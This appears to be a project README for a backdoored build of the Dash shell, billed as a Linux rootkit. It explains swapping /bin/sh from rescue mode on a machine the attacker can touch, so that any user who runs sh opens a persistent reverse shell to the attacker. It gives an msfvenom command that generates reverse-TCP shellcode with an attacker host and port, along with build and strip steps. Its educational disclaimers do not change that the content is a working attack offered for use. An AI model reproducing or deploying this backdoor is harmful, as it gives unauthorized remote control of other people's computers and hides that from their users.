The purpose of this is to demonstrate what security risks there are when someone gains physical access to your computer.
THIS CODE IS MALWARE!!! IT IS A LINUX TROJAN BACKDOOR! IT WILL OPEN A BACKDOOR INTO YOUR COMPUTER SYSTEM AND WILL ALLOW UNAUTHORIZED ACCESS TO IT. EXERCISE EXTREME CAUTION AND USE SECURITY BEST PRACTICES FOR EDUCATION USE.
An attack might look like this: Enter rescue mode and pop a root shell without a password. Replace the /bin/sh binary with this rootkit. The users probably won't know. The shell will still be 100% functional. Use this for persistence so the next time an authorized user accesses their account (with the 'sh' shell), you will receive a reverse shell that persists (in a new process) even after the terminal is closed.
The modified code is well documented.
Change the shellcode in the pskexec_dash()
function.
You can use a command like msfvenom -p linux/x64/shell_reverse_tcp PrependFork=true LHOST=0.0.0.0 LPORT=3443 -f raw > shellcode.bin.tmp; xxd -i shellcode.bin.tmp > shellcode-addme.c; rm shellcode.bin.tmp
to generate a replacement. Make sure to change the IP address and port number in the above command to your server.
If you find this code useful, please leave a star ⭐.
Run the following commands.
./autogen.sh
./configure
make
strip ./src/dash
# DO NOT RUN `make install` OR THE MALWARE WILL INSTALL ON YOUR COMPUTER!!!
The binary is located in ./src/dash
.
This project was developed for security research, curiosity, ethical hacking, and educational purposes. It was intended to be used responsibly. Do not use this code for anything illegal in your jurisdiction. LICENSE TERMS APPLY.
Hack responsibly.
I can port this code to other Linux binaries if anyone finds it useful. This rootkit is easily integrated into any other GNU/Linux C/C++ program.
The creators of the original "Dash" Software and their affiliates do not support or endorse the "dash-shell-rootkit " project. See the COPYING file for the previous "Dash" license.
If you find this code useful, please leave a star ⭐.